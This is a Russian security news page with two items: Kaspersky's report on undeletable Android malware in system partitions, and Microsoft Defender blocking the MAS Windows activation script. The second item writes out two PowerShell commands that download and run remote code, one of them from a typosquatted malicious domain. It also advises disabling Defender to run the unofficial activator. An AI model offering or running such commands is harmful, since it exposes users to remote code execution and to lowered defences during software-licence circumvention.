14,8% заражённых Android-устройств столкнулись с неудаляемыми файлами

14,8% заражённых Android-устройств столкнулись с неудаляемыми файлами

14,8% заражённых Android-устройств столкнулись с неудаляемыми файлами

По словам специалистов «Лаборатории Касперского», у 14,8% пользователей Android, столкнувшихся в своё время с вредоносными программами и адваре для мобильных устройств, остались на смартфонах неудаляемые файлы.

Таким образом, немалая часть пользователей Android-устройств, ставших в прошлом году жертвами вредоносов, в довесок пострадала от заражения системного раздела. При такой форме атаки удалить впоследствии вредоносные файлы практически невозможно.

Согласно новому отчёту «Лаборатории Касперского», на смартфонах 14,8% пользователей, пострадавших от подобных атак, до сих пор присутствуют файлы вредоносных программ, которые невозможно удалить традиционными способами.

Такие файлы могут принадлежать как серьёзным троянам, способным устанавливать и запускать дополнительные зловреды, так и менее опасным, но при этом надоедливым рекламным приложениям класса адваре.

«Заражение системного раздела несёт в себе серьёзные риски для конечных пользователей, поскольку стандартные антивирусные программы не могут добраться до системных директорий. Это значит, что удалить оставшиеся вредоносные файлы просто так не получится», — пишет команда «Лаборатории Касперского».

Добраться до системного раздела потенциальный вредонос может двумя способами. Первый — получить root-доступ и установить нежелательное приложение в системный раздел. Второй — адваре уже будет «вшито» в прошивку на этапе производства, ещё до того, как попадёт в руки пользователя.

Помимо этого, специалисты выявили на ряде Andrpod-устройств предустановленные приложения, удалить которые тоже нельзя. Такой софт, как правило, можно найти на бюджетных смартфонах.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru